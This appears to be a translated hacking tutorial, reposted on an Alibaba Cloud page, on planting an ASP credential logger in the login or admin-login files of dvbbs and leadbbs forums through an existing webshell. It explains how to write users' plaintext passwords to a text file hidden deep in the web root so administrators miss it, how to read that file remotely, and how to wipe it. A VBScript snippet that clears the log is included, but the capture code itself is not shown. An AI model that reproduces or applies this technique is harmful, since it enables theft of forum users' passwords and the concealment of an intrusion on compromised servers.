ASP records forum user passwords (dvbbs, leadbbs, etc)

Source: Internet
Author: User

Many people are depressed when they get a database with a dynamic network --Now We Have Another Method !!!!!

This is to use asp to record the plaintext password.

Usage:

1. Insert this code into the end of the login. asp or admin_login.asp file to verify the login.
2. Change the PATH to an accessible PATH on the web, such as: C:/Inetpub/wwwroot/.../Info.txtinfo.txt. The deeper the PATH, the better, to prevent the admin from discovering it)
3. Your webshell must have the permission to modify the file and FileSystemObject is available.
4. Access http: //.../Info.txt on IE after a period of time to view the account password of the logged-on user.
5. On IE, enter http: //.../(which your modified). asp? U=delcan clear the content of info.txt.

Note:

1. You can add other functions for it, such as record-recorded users and email receiving passwords.
2.In order to prevent excessive info.txtsizes, I use the clear info.txt method.

Of course, you can create a new file to solve this problem.

If filesize> 200000 then
Set file2 = fso. OpenTextFile (PATH, 2, True)
File2.WriteLine ""
File2.close
End if


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.